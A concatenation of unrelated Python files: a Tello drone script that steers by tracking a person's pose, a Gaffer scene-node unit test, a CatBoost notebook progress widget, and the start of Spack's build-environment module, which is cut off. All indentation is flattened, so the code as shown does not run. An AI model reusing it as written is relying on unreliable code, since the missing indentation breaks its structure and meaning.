heatmapConf[i,:] = max_i
return heatmapPositions,heatmapConf
def get_offsetVector(heatmapPositions=None,offsets=None):
allArrays = np.zeros(shape=(17,2))
for idx,el in enumerate(heatmapPositions):
# print(el)
allArrays[idx,0] = offsets[int(el[0]),int(el[1]),idx]
allArrays[idx,1] = offsets[int(el[0]),int(el[1]),17+idx]
return allArrays
MODEL_NAME = "pose_TFLite_model"
GRAPH_NAME = 'detect.tflite'
LABELMAP_NAME = 'labelmap.txt'
resW, resH = '952x720'.split('x')
imW, imH = int(resW), int(resH)
use_TPU = False
min_thresh = 0.7
# Get path to current working directory
CWD_PATH = os.getcwd()
# Path to .tflite file, which contains the model that is used for object detection
PATH_TO_CKPT = os.path.join(CWD_PATH,MODEL_NAME,GRAPH_NAME)
# Path to label map file
PATH_TO_LABELS = os.path.join(CWD_PATH,MODEL_NAME,LABELMAP_NAME)
# Load the label map
with open(PATH_TO_LABELS, 'r') as f:
labels = [line.strip() for line in f.readlines()]
# Have to do a weird fix for label map if using the COCO "starter model" from
# https://www.tensorflow.org/lite/models/object_detection/overview
# First label is '???', which has to be removed.
if labels[0] == '???':
del(labels[0])
# Load the Tensorflow Lite model.
# If using Edge TPU, use special load_delegate argument
if use_TPU:
interpreter = Interpreter(model_path=PATH_TO_CKPT,
experimental_delegates=[load_delegate('libedgetpu.so.1.0')])
print(PATH_TO_CKPT)
else:
interpreter = Interpreter(model_path=PATH_TO_CKPT)
interpreter.allocate_tensors()
# Get model details
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
height = input_details[0]['shape'][1]
width = input_details[0]['shape'][2]
floating_model = (input_details[0]['dtype'] == np.float32)
input_mean = width/2
input_std = width/2
# Initialize frame rate calculation
frame_rate_calc = 1
freq = cv2.getTickFrequency()
#posenet
def main():
""" Create a tello controller and show the video feed."""
tellotrack = TelloCV()
# for packet in tellotrack.container.demux((tellotrack.vid_stream,)):
# for frame in packet.decode():
# start = time.time()
# image = tellotrack.process_frame(frame)
# print("image_time",time.time()-start)
# cv2.imshow('tello', image)
# _ = cv2.waitKey(1) & 0xFF
#posenet
try:
threading.Thread(target=tellotrack.recv_thread).start()
while True:
if frame is None:
time.sleep(0.01)
else:
# print("frame FOUNDD")
image = tellotrack.process_frame(frame)
cv2.imshow('Original', image)
# cv2.imshow('Canny', cv2.Canny(image, 100, 200))
cv2.waitKey(1)
# long delay
# time.sleep(0.5)
image = None
except Exception as ex:
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback)
print(ex)
finally:
run_recv_thread = False
cv2.destroyAllWindows()
#posenet
class TelloCV(object):
"""
TelloTracker builds keyboard controls on top of TelloPy as well
as generating images from the video stream and enabling opencv support
"""
def __init__(self):
self.prev_flight_data = None
self.record = False
self.tracking = False
self.keydown = False
self.date_fmt = '%Y-%m-%d_%H%M%S'
self.speed = 50
self.drone = tellopy.Tello()
self.init_drone() #posenet
self.init_controls()
# container for processing the packets into frames
self.container = av.open(self.drone.get_video_stream())
self.vid_stream = self.container.streams.video[0]
self.out_file = None
self.out_stream = None
self.out_name = None
self.start_time = time.time()
# tracking a color
green_lower = (30, 50, 50)
green_upper = (80, 255, 255)
#red_lower = (0, 50, 50)
# red_upper = (20, 255, 255)
# blue_lower = (110, 50, 50)
# upper_blue = (130, 255, 255)
self.track_cmd = ""
# self.tracker = Tracker(self.vid_stream.height,
# self.vid_stream.width,
# green_lower, green_upper) #posenet
self.tracker = Tracker(720,
960,
green_lower, green_upper) #posenet
#posenet
def recv_thread(self):
global frame
global run_recv_thread
print('start recv_thread()')
# drone = tellopy.Tello()
try:
# self.drone.connect()
# self.drone.wait_for_connection(60.0)
# #posenet
# self.drone.start_video()
# self.drone.subscribe(self.drone.EVENT_FLIGHT_DATA,
# self.flight_data_handler)
# self.drone.subscribe(self.drone.EVENT_FILE_RECEIVED,
# self.handle_flight_received)
#posenet
# container = av.open(self.drone.get_video_stream())
frame_count = 0
while run_recv_thread:
for f in self.container.decode(video=0):
frame_count = frame_count + 1
# skip first 300 frames
if frame_count < 300:
continue
frame = f
time.sleep(0.01)
except Exception as ex:
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback)
print(ex)
finally:
self.drone.quit()
#posenet
def init_drone(self):
"""Connect, uneable streaming and subscribe to events"""
# self.drone.log.set_level(2)
self.drone.connect()
self.drone.wait_for_connection(60.0) #posenet
self.drone.start_video()
self.drone.subscribe(self.drone.EVENT_FLIGHT_DATA,
self.flight_data_handler)
self.drone.subscribe(self.drone.EVENT_FILE_RECEIVED,
self.handle_flight_received)
def on_press(self, keyname):
"""handler for keyboard listener"""
if self.keydown:
return
try:
self.keydown = True
keyname = str(keyname).strip('\'')
print('+' + keyname)
if keyname == 'Key.esc':
self.drone.quit()
exit(0)
if keyname in self.controls:
key_handler = self.controls[keyname]
if isinstance(key_handler, str):
getattr(self.drone, key_handler)(self.speed)
else:
key_handler(self.speed)
except AttributeError:
print('special key {0} pressed'.format(keyname))
def on_release(self, keyname):
"""Reset on key up from keyboard listener"""
self.keydown = False
keyname = str(keyname).strip('\'')
print('-' + keyname)
if keyname in self.controls:
key_handler = self.controls[keyname]
if isinstance(key_handler, str):
getattr(self.drone, key_handler)(0)
else:
key_handler(0)
def init_controls(self):
"""Define keys and add listener"""
self.controls = {
'w': lambda speed: self.drone.forward(speed),#'forward',
's': 'backward',
'a': 'left',
'd': 'right',
'Key.space': 'up',
'Key.shift': 'down',
'Key.shift_r': 'down',
'q': 'counter_clockwise',
'e': 'clockwise',
'i': lambda speed: self.drone.flip_forward(),
'k': lambda speed: self.drone.flip_back(),
'j': lambda speed: self.drone.flip_left(),
'l': lambda speed: self.drone.flip_right(),
# arrow keys for fast turns and altitude adjustments
'Key.left': lambda speed: self.drone.counter_clockwise(speed),
'Key.right': lambda speed: self.drone.clockwise(speed),
'Key.up': lambda speed: self.drone.up(speed),
'Key.down': lambda speed: self.drone.down(speed),
'Key.tab': lambda speed: self.drone.takeoff(),
'Key.backspace': lambda speed: self.drone.land(),
'p': lambda speed: self.palm_land(speed),
't': lambda speed: self.toggle_tracking(speed),
'r': lambda speed: self.toggle_recording(speed),
'z': lambda speed: self.toggle_zoom(speed),
'Key.enter': lambda speed: self.take_picture(speed)
}
self.key_listener = keyboard.Listener(on_press=self.on_press,
on_release=self.on_release)
self.key_listener.start()
# self.key_listener.join()
def process_frame(self, frame):
"""convert frame to cv2 image and show"""
# Start timer (for calculating frame rate)
t1 = cv2.getTickCount()
image = cv2.cvtColor(numpy.array(
frame.to_image()), cv2.COLOR_RGB2BGR)
image = self.write_hud(image)
if self.record:
self.record_vid(frame)
# xoff, yoff = self.tracker.track(image)
xoff, yoff = 0,0
xLeftWrist, yLeftWrist =0,0
xNose, yNose =0,0
# print("CV xoff{}, yoff {}".format(xoff, yoff))
#posenet
frame_rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
frame_resized = cv2.resize(frame_rgb, (width, height))
input_data = np.expand_dims(frame_resized, axis=0)
# Normalize pixel values if using a floating model (i.e. if model is non-quantized)
if floating_model:
input_data = (np.float32(input_data) - input_mean) / input_std
# Perform the actual detection by running the model with the image as input
interpreter.set_tensor(input_details[0]['index'],input_data)
interpreter.invoke()
heatmapscores = interpreter.get_tensor(output_details[0]['index'])[0] # Bounding box coordinates of detected objects
offsets = interpreter.get_tensor(output_details[1]['index'])[0] # Class index of detected objects
# define vectorized sigmoid
sigmoid_v = np.vectorize(sigmoid)
# 1 sigmoid
sigmoheatmapscores = sigmoid_v(heatmapscores)
# 2 argmax2d
heatmapPositions,heatmapConfidence = argmax2d(sigmoheatmapscores)
# 3 offsetVectors
offsetVectors = get_offsetVector(heatmapPositions,offsets)
# 4 keypointPositions
outputStride = 32
keypointPositions = heatmapPositions * outputStride + offsetVectors
# 5 draw keypoints
for idx,el in enumerate(heatmapConfidence):
if heatmapConfidence[idx][0] >= min_thresh:
x = round((keypointPositions[idx][1]/width)*imW)
y = round((keypointPositions[idx][0]/height)*imH)
if 'right' in labels[idx]:
cv2.circle(image,(int(x),int(y)), 5, (0,255,0), -1)
elif 'left' in labels[idx]:
cv2.circle(image,(int(x),int(y)), 5, (0,0,255), -1)
elif 'nose' in labels[idx]:
xNose, yNose = int(x),int(y)
xoff, yoff = (x-int(960/2)),(int(720/2)-y)
# print("NOSE xoff{}, yoff {}".format(xoff, yoff))
cv2.circle(image,(int(x),int(y)), 5, (255,0,0), -1)
if 'leftWri' in labels[idx]:
xLeftWrist, yLeftWrist = int(x),int(y)
#posenet
def draw_arrows(frame):
"""Show the direction vector output in the cv2 window"""
#cv2.putText(frame,"Color:", (0, 35), cv2.FONT_HERSHEY_SIMPLEX, 1, 255, thickness=2)
cv2.arrowedLine(frame, (int(960/2), int(720/2)),
(int(960/2 + xoff), int(720/2 - yoff)),
(0, 0, 255), 1)
return frame
# image = self.tracker.draw_arrows(image)
image = draw_arrows(image)
# Calculate framerate
t2 = cv2.getTickCount()
time1 = (t2-t1)/freq
frame_rate_calc= 1/time1
# Draw framerate in corner of frame
cv2.putText(image,
'FPS: {0:.2f}'.format(frame_rate_calc),
(imW-200,30),
cv2.FONT_HERSHEY_SIMPLEX,
1,
(255,255,0),
1,
cv2.LINE_AA)
distance = 150
cmd = ""
# print(yoff)
# print("WRIST {}>>>> NOSE {}???? ".format(yLeftWrist,yNose),yLeftWrist>yNose)
if self.tracking:
# if yLeftWrist>yNose:
# print("RECORDING",yLeftWrist)
# cmd = "r"
# lambda speed: self.toggle_recording(speed)
if xoff < -distance and xoff>-960/2:
cmd = "counter_clockwise"
elif xoff > distance and xoff<960/2:
cmd = "clockwise"
elif yoff < -distance and yoff>-720/2:
cmd = "down"
elif yoff > distance and yoff<720/2:
print("UPPPPPPPPPPPPPPP",yoff)
cmd = "up"
else:
if self.track_cmd is not "":
getattr(self.drone, self.track_cmd)(0)
self.track_cmd = ""
if cmd is not self.track_cmd:
if cmd is not "":
print("track command:", cmd)
getattr(self.drone, cmd)(self.speed)
self.track_cmd = cmd
return image
def write_hud(self, frame):
"""Draw drone info, tracking and record on frame"""
stats = self.prev_flight_data.split('|')
stats.append("Tracking:" + str(self.tracking))
if self.drone.zoom:
stats.append("VID")
else:
stats.append("PIC")
if self.record:
diff = int(time.time() - self.start_time)
mins, secs = divmod(diff, 60)
stats.append("REC {:02d}:{:02d}".format(mins, secs))
for idx, stat in enumerate(stats):
text = stat.lstrip()
cv2.putText(frame, text, (0, 30 + (idx * 30)),
cv2.FONT_HERSHEY_SIMPLEX,
1.0, (255, 0, 0), lineType=30)
return frame
def toggle_recording(self, speed):
"""Handle recording keypress, creates output stream and file"""
if speed == 0:
return
self.record = not self.record
if self.record:
datename = [os.getenv('HOME'), datetime.datetime.now().strftime(self.date_fmt)]
self.out_name = '{}/Pictures/tello-{}.mp4'.format(*datename)
print("Outputting video to:", self.out_name)
self.out_file = av.open(self.out_name, 'w')
self.start_time = time.time()
self.out_stream = self.out_file.add_stream(
'mpeg4', self.vid_stream.rate)
self.out_stream.pix_fmt = 'yuv420p'
self.out_stream.width = self.vid_stream.width
self.out_stream.height = self.vid_stream.height
if not self.record:
print("Video saved to ", self.out_name)
self.out_file.close()
self.out_stream = None
def record_vid(self, frame):
"""
convert frames to packets and write to file
"""
new_frame = av.VideoFrame(
width=frame.width, height=frame.height, format=frame.format.name)
for i in range(len(frame.planes)):
new_frame.planes[i].update(frame.planes[i])
pkt = None
try:
pkt = self.out_stream.encode(new_frame)
except IOError as err:
print("encoding failed: {0}".format(err))
if pkt is not None:
try:
self.out_file.mux(pkt)
except IOError:
print('mux failed: ' + str(pkt))
def take_picture(self, speed):
"""Tell drone to take picture, image sent to file handler"""
if speed == 0:
return
self.drone.take_picture()
def palm_land(self, speed):
"""Tell drone to land"""
if speed == 0:
return
self.drone.palm_land()
def toggle_tracking(self, speed):
""" Handle tracking keypress"""
if speed == 0: # handle key up event
return
self.tracking = not self.tracking
print("tracking:", self.tracking)
return
def toggle_zoom(self, speed):
"""
In "video" mode the self.drone sends 1280x720 frames.
In "photo" mode it sends 2592x1936 (952x720) frames.
The video will always be centered in the window.
In photo mode, if we keep the window at 1280x720 that gives us ~160px on
each side for status information, which is ample.
Video mode is harder because then we need to abandon the 16:9 display size
if we want to put the HUD next to the video.
"""
if speed == 0:
return
self.drone.set_video_mode(not self.drone.zoom)
def flight_data_handler(self, event, sender, data):
"""Listener to flight data from the drone."""
text = str(data)
if self.prev_flight_data != text:
self.prev_flight_data = text
def handle_flight_received(self, event, sender, data):
"""Create a file in ~/Pictures/ to receive image from the drone"""
path = '%s/Pictures/tello-%s.jpeg' % (
os.getenv('HOME'),
datetime.datetime.now().strftime(self.date_fmt))
with open(path, 'wb') as out_file:
out_file.write(data)
print('Saved photo to %s' % path)
if __name__ == '__main__':
main()
|
SceneNodeTest.py
|
##########################################################################
#
# Copyright (c) 2012, John Haddon. All rights reserved.
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import threading
import imath
import IECore
import IECoreScene
import Gaffer
import GafferTest
import GafferScene
import GafferSceneTest
class SceneNodeTest( GafferSceneTest.SceneTestCase ) :
def testRootConstraints( self ) :
# we don't allow the root of the scene ("/") to carry objects, transforms,
# or attributes. if we did, then there wouldn't be a sensible way of merging
# them (particularly transforms) when a Group node has multiple inputs.
# it's also pretty confusing to have stuff go on at the root level,
# particularly as the root isn't well represented in the HierarchyView editor,
# and applications like maya don't have stuff happening at the root
# level either. we achieve this by having the SceneNode simply not
# call the various processing functions for the root.
node = GafferSceneTest.CompoundObjectSource()
node["in"].setValue(
IECore.CompoundObject( {
"object" : IECoreScene.SpherePrimitive()
} )
)
self.assertEqual( node["out"].object( "/" ), IECore.NullObject() )
node = GafferSceneTest.CompoundObjectSource()
node["in"].setValue(
IECore.CompoundObject( {
"transform" : IECore.M44fData( imath.M44f().translate( imath.V3f( 1 ) ) )
} )
)
self.assertEqual( node["out"].transform( "/" ), imath.M44f() )
node = GafferSceneTest.CompoundObjectSource()
node["in"].setValue(
IECore.CompoundObject( {
"attributes" : IECore.CompoundObject()
} )
)
self.assertEqual( node["out"].attributes( "/" ), IECore.CompoundObject() )
def testTypeNamePrefixes( self ) :
self.assertTypeNamesArePrefixed( GafferScene, namesToIgnore = set( ( "PathMatcherData", "Gaffer::PathMatcherDataPlug" ) ) )
def testDefaultNames( self ) :
self.assertDefaultNamesAreCorrect( GafferScene )
def testRootAttributes( self ) :
# create node inheriting from SceneNode:
node = GafferScene.CustomAttributes()
node["attributes"].addOptionalMember( "user:foobar", True, enabled = True )
# scene nodes always have passthrough behaviour for attributes at the root, so this particular one should return an empty compound object:
context = Gaffer.Context()
context.set( "scene:path", IECore.InternedStringVectorData([]) )
with context:
self.assertEqual( node["out"]["attributes"].getValue(), IECore.CompoundObject() )
# unless the caching system is misbehaving, it should return the attribute values we asked for at other locations:
context.set( "scene:path", IECore.InternedStringVectorData(["yup"]) )
with context:
self.assertEqual( node["out"]["attributes"].getValue(), IECore.CompoundObject({'user:foobar':IECore.BoolData( 1 )}) )
def testRootObject( self ):
# okie dokie - create a sphere node and check it's generating a sphere in the correct place:
sphere = GafferScene.Sphere()
context = Gaffer.Context()
context.set("scene:path", IECore.InternedStringVectorData(["sphere"]) )
with context:
self.assertEqual( sphere["out"]["object"].getValue().typeId(), IECoreScene.MeshPrimitive.staticTypeId() )
# right, now subtree it. If the cache is behaving itself, then there shouldn't be an object at the root of the
# resulting scene, cuz that aint allowed.
subTree = GafferScene.SubTree()
subTree["in"].setInput( sphere["out"] )
subTree["root"].setValue("sphere")
context.set("scene:path", IECore.InternedStringVectorData([]) )
with context:
self.assertEqual( subTree["out"]["object"].getValue().typeId(), IECore.NullObject.staticTypeId() )
def testRootTransform( self ):
# okie dokie - create a sphere node and check it's generating a sphere in the correct place:
sphere = GafferScene.Sphere()
sphere["transform"]["translate"]["x"].setValue( 1.0 )
sphere["transform"]["translate"]["y"].setValue( 2.0 )
sphere["transform"]["translate"]["z"].setValue( 3.0 )
context = Gaffer.Context()
context.set("scene:path", IECore.InternedStringVectorData(["sphere"]) )
with context:
self.assertEqual( sphere["out"]["transform"].getValue(), imath.M44f().translate( imath.V3f( 1,2,3 ) ) )
# right, now subtree it. If the cache is behaving itself, then the transform at the root of the
# resulting scene should be set to identity.
subTree = GafferScene.SubTree()
subTree["in"].setInput( sphere["out"] )
subTree["root"].setValue("sphere")
context.set("scene:path", IECore.InternedStringVectorData([]) )
with context:
self.assertEqual( subTree["out"]["transform"].getValue(), imath.M44f() )
def testCacheThreadSafety( self ) :
p1 = GafferScene.Plane()
p1["divisions"].setValue( imath.V2i( 50 ) )
p2 = GafferScene.Plane()
p2["divisions"].setValue( imath.V2i( 51 ) )
g = GafferScene.Group()
g["in"][0].setInput( p1["out"] )
g["in"][1].setInput( p2["out"] )
# not enough for both objects - will cause cache thrashing
Gaffer.ValuePlug.setCacheMemoryLimit( p1["out"].object( "/plane" ).memoryUsage() )
exceptions = []
def traverser() :
try :
GafferSceneTest.traverseScene( g["out"] )
except Exception, e :
exceptions.append( e )
threads = []
for i in range( 0, 10 ) :
thread = threading.Thread( target = traverser )
threads.append( thread )
thread.start()
for thread in threads :
thread.join()
for e in exceptions :
raise e
def testNodesConstructWithDefaultValues( self ) :
self.assertNodesConstructWithDefaultValues( GafferScene )
def testDerivingInPython( self ) :
# We allow deriving in Python for use as a "shell" node containing
# an internal node network which provides the implementation. But
# we don't allow the overriding of the compute*() and hash*() methods
# because the performance would be abysmal.
class SphereOrCube( GafferScene.SceneNode ) :
Type = IECore.Enum.create( "Sphere", "Cube" )
def __init__( self, name = "SphereOrCube" ) :
GafferScene.SceneNode.__init__( self, name )
self["type"] = Gaffer.IntPlug(
defaultValue = int( self.Type.Sphere ),
minValue = int( self.Type.Sphere ),
maxValue = int( self.Type.Cube ),
)
self["__sphere"] = GafferScene.Sphere()
self["__sphere"]["enabled"].setInput( self["enabled"] )
self["__cube"] = GafferScene.Cube()
self["__cube"]["enabled"].setInput( self["enabled"] )
self["__primitiveSwitch"] = GafferScene.SceneSwitch()
self["__primitiveSwitch"]["index"].setInput( self["type"] )
self["__primitiveSwitch"]["in"][0].setInput( self["__sphere"]["out"] )
self["__primitiveSwitch"]["in"][1].setInput( self["__cube"]["out"] )
self["out"].setInput( self["__primitiveSwitch"]["out"] )
IECore.registerRunTimeTyped( SphereOrCube )
Gaffer.Metadata.registerNode(
SphereOrCube,
"description",
"""
A little test node
""",
plugs = {
"type" : [
"description",
"""
Pick yer lovely primitive here.
""",
"preset:Sphere", int( SphereOrCube.Type.Sphere ),
"preset:Cube", int( SphereOrCube.Type.Cube ),
]
}
)
n = SphereOrCube()
self.assertEqual( n["out"].childNames( "/"), IECore.InternedStringVectorData( [ "sphere" ] ) )
n["type"].setValue( int( n.Type.Cube ) )
self.assertEqual( n["out"].childNames( "/"), IECore.InternedStringVectorData( [ "cube" ] ) )
n["enabled"].setValue( False )
self.assertEqual( n["out"].childNames( "/"), IECore.InternedStringVectorData() )
self.assertEqual(
Gaffer.Metadata.value( n, "description" ),
"A little test node",
)
self.assertEqual(
Gaffer.Metadata.value( n["type"], "description" ),
"Pick yer lovely primitive here.",
)
self.assertEqual( Gaffer.NodeAlgo.presets( n["type"] ), [ "Sphere", "Cube" ] )
def setUp( self ) :
GafferSceneTest.SceneTestCase.setUp( self )
self.__previousCacheMemoryLimit = Gaffer.ValuePlug.getCacheMemoryLimit()
def tearDown( self ) :
GafferSceneTest.SceneTestCase.tearDown( self )
Gaffer.ValuePlug.setCacheMemoryLimit( self.__previousCacheMemoryLimit )
if __name__ == "__main__":
unittest.main()
|
ipythonwidget.py
|
import os
import csv
import time
from threading import Thread
from IPython.core.display import display, HTML
from traitlets import Unicode, Dict, default
from ipywidgets import DOMWidget, Layout, widget_serialization
class CatboostIpythonWidget(DOMWidget):
_view_name = Unicode('CatboostIpythonWidgetView').tag(sync=True)
_view_module = Unicode('catboost_module').tag(sync=True)
data = Dict({}).tag(sync=True, **widget_serialization)
def __init__(self, train_dir):
super(self.__class__, self).__init__()
self.train_dir = train_dir
@default('layout')
def _default_layout(self):
return Layout(height='500px', align_self='stretch')
def update_widget(self, subdirs=False):
# wait for start train (meta.tsv)
self.init_static()
time.sleep(1.0)
self.update_data(subdirs=subdirs)
display(self)
while self.needUpdate:
self.update_data(subdirs=subdirs)
time.sleep(2.0)
def run_update(self):
thread = Thread(target=self.update_widget, args=())
thread.start()
def get_subdirectories(self, a_dir):
return [{'name': name, 'path': os.path.join(a_dir, name)}
for name in os.listdir(a_dir) if os.path.isdir(os.path.join(a_dir, name))]
def update_data(self, subdirs=False):
data = {}
dirs = [{'name': 'current', 'path': self.train_dir}]
needUpdate = False
if subdirs:
dirs = self.get_subdirectories(self.train_dir)
for dir_info in dirs:
path = dir_info.get('path')
content = self.update_data_from_dir(path)
if not content:
continue
data[path] = {
'path': path,
'name': dir_info.get('name'),
'content': content
}
if not needUpdate:
needUpdate = data[path]['content']['passed_iterations'] < data[path]['content']['total_iterations']
self.data = data
self.needUpdate = needUpdate
def update_data_from_dir(self, path):
data = {
'learn_error': [],
'test_error': [],
'time_left': '',
'meta': []
}
meta_tsv = os.path.join(path, 'meta.tsv')
if os.path.isfile(meta_tsv):
with open(meta_tsv, 'r') as meta_in:
data['meta'] = {}
for row in list(csv.reader(meta_in, delimiter='\t')):
if not len(row):
continue
if row[0] != 'loss':
data['meta'][row[0]] = row[1]
else:
data['meta'][row[0] + '_' + row[1]] = row[2]
logs = {
'test_error': data['meta']['testErrorLog'] if 'testErrorLog' in data['meta'] else 'test_error.tsv',
'learn_error': data['meta']['learnErrorLog'] if 'learnErrorLog' in data['meta'] else 'learn_error.tsv',
'time_left': data['meta']['timeLeft'] if 'timeLeft' in data['meta'] else 'time_left.tsv'
}
for error_type in logs:
file_path = os.path.join(path, logs[error_type])
if os.path.isfile(file_path):
with open(file_path, 'r') as f:
data[error_type] = list(csv.reader(f, delimiter='\t'))
passed_test_iterations = len(data['test_error']) - 1
passed_learn_iterations = len(data['learn_error']) - 1
passed_iterations = 0
if (passed_test_iterations > 0 and passed_learn_iterations > 0):
passed_iterations = min(passed_test_iterations, passed_learn_iterations)
elif passed_test_iterations > 0:
passed_iterations = passed_test_iterations
elif passed_learn_iterations > 0:
passed_iterations = passed_learn_iterations
if data['meta'] and data['meta']['iterCount']:
return {
'passed_iterations': passed_iterations,
'total_iterations': int(data['meta']['iterCount']),
'rows': data
}
else:
return None
@staticmethod
def get_static_path(file_name):
return os.path.join(os.path.dirname(__file__), file_name)
def init_static(self):
with open(self.get_static_path('CatboostIpython.css')) as f:
css = f.read()
js = ''
# never use require in your projects
js += 'window.__define = window.define;window.__require = window.require;window.define = undefined;window.require = undefined;'
with open(self.get_static_path('plotly-basic.min.js')) as f:
js += f.read()
js += 'window.define = window.__define;window.require = window.__require;window.__define = undefined; window.__require = undefined;'
with open(self.get_static_path('CatboostIpythonPlotly.js')) as f:
js += f.read()
with open(self.get_static_path('CatboostIpythonInit.js')) as f:
js += f.read()
html = """
<style>
{}
</style>
<script>
{}
</script>
""".format(css, js)
display(HTML(html))
|
build_environment.py
|
# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
"""
This module contains all routines related to setting up the package
build environment. All of this is set up by package.py just before
install() is called.
There are two parts to the build environment:
1. Python build environment (i.e. install() method)
This is how things are set up when install() is called. Spack
takes advantage of each package being in its own module by adding a
bunch of command-like functions (like configure(), make(), etc.) in
the package's module scope. Ths allows package writers to call
them all directly in Package.install() without writing 'self.'
everywhere. No, this isn't Pythonic. Yes, it makes the code more
readable and more like the shell script from which someone is
likely porting.
2. Build execution environment
This is the set of environment variables, like PATH, CC, CXX,
etc. that control the build. There are also a number of
environment variables used to pass information (like RPATHs and
other information about dependencies) to Spack's compiler wrappers.
All of these env vars are also set up here.
Skimming this module is a nice way to get acquainted with the types of
calls you can make from within the install() function.
"""
import inspect
import multiprocessing
import os
import shutil
import sys
import traceback
import types
from six import iteritems
from six import StringIO
import llnl.util.tty as tty
from llnl.util.tty.color import cescape, colorize
from llnl.util.filesystem import mkdirp, install, install_tree
from llnl.util.lang import dedupe
import spack.build_systems.cmake
import spack.build_systems.meson
import spack.config
import spack.main
import spack.paths
import spack.store
from spack.util.string import plural
from spack.util.environment import (
env_flag, filter_system_paths, get_path, is_system_path,
EnvironmentModifications, validate, preserve_environment)
from spack.util.environment import system_dirs
from spack.error import NoLibrariesError, NoHeadersError
from spack.util.executable import Executable
from spack.util.module_cmd import load_module, get_path_from_module
from spack.util.log_parse import parse_log_events, make_log_context
#
# This can be set by the user to globally disable parallel builds.
#
SPACK_NO_PARALLEL_MAKE = 'SPACK_NO_PARALLEL_MAKE'
#
# These environment variables are set by
# set_build_environment_variables and used to pass parameters to
# Spack's compiler wrappers.
#
SPACK_ENV_PATH = 'SPACK_ENV_PATH'
SPACK_INCLUDE_DIRS = 'SPACK_INCLUDE_DIRS'
SPACK_LINK_DIRS = 'SPACK_LINK_DIRS'
SPACK_RPATH_DIRS = 'SPACK_RPATH_DIRS'
SPACK_RPATH_DEPS = 'SPACK_RPATH_DEPS'
SPACK_LINK_DEPS = 'SPACK_LINK_DEPS'
SPACK_PREFIX = 'SPACK_PREFIX'
SPACK_INSTALL = 'SPACK_INSTALL'
SPACK_DEBUG = 'SPACK_DEBUG'
SPACK_SHORT_SPEC = 'SPACK_SHORT_SPEC'
SPACK_DEBUG_LOG_ID = 'SPACK_DEBUG_LOG_ID'
SPACK_DEBUG_LOG_DIR = 'SPACK_DEBUG_LOG_DIR'
SPACK_CCACHE_BINARY = 'SPACK_CCACHE_BINARY'
SPACK_SYSTEM_DIRS = 'SPACK_SYSTEM_DIRS'
# Platform-specific library suffix.
dso_suffix = 'dylib' if sys.platform == 'darwin' else 'so'
class MakeExecutable(Executable):
"""Special callable executable object for make so the user can specify
parallelism options on a per-invocation basis. Specifying
'parallel' to the call will override whatever the package's
global setting is, so you can either default to true or false and
override particular calls. Specifying 'jobs_env' to a particular
call will name an environment variable which will be set to the
parallelism level (without affecting the normal invocation with
-j).
Note that if the SPACK_NO_PARALLEL_MAKE env var is set it overrides
everything.
"""
def __init__(self, name, jobs):
super(MakeExecutable, self).__init__(name)
self.jobs = jobs
def __call__(self, *args, **kwargs):
"""parallel, and jobs_env from kwargs are swallowed and used here;
remaining arguments are passed through to the superclass.
"""
disable = env_flag(SPACK_NO_PARALLEL_MAKE)
parallel = (not disable) and kwargs.pop('parallel', self.jobs > 1)
if parallel:
args = ('-j{0}'.format(self.jobs),) + args
jobs_env = kwargs.pop('jobs_env', None)
if jobs_env:
# Caller wants us to set an environment variable to
# control the parallelism.
kwargs['extra_env'] = {jobs_env: str(self.jobs)}
return super(MakeExecutable, self).__call__(*args, **kwargs)
def clean_environment():
# Stuff in here sanitizes the build environment to eliminate
# anything the user has set that may interfere. We apply it immediately
# unlike the other functions so it doesn't overwrite what the modules load.
env = EnvironmentModifications()
# Remove these vars from the environment during build because they
# can affect how some packages find libraries. We want to make
# sure that builds never pull in unintended external dependencies.
env.unset('LD_LIBRARY_PATH')
env.unset('LIBRARY_PATH')
env.unset('CPATH')
env.unset('LD_RUN_PATH')
env.unset('DYLD_LIBRARY_PATH')
build_lang = spack.config.get('config:build_language')
if build_lang:
# Override language-related variables. This can be used to force
# English compiler messages etc., which allows parse_log_events to
# show useful matches.
env.set('LC_ALL', build_lang)
# Remove any macports installs from the PATH. The macports ld can
# cause conflicts with the built-in linker on el capitan. Solves
# assembler issues, e.g.:
# suffix or operands invalid for `movq'"
path = get_path('PATH')
for p in path:
if '/macports/' in p:
env.remove_path('PATH', p)
env.apply_modifications()
def set_compiler_environment_variables(pkg, env):
assert pkg.spec.concrete
compiler = pkg.compiler
# Set compiler variables used by CMake and autotools
assert all(key in compiler.link_paths for key in (
'cc', 'cxx', 'f77', 'fc'))
# Populate an object with the list of environment modifications
# and return it
# TODO : add additional kwargs for better diagnostics, like requestor,
# ttyout, ttyerr, etc.
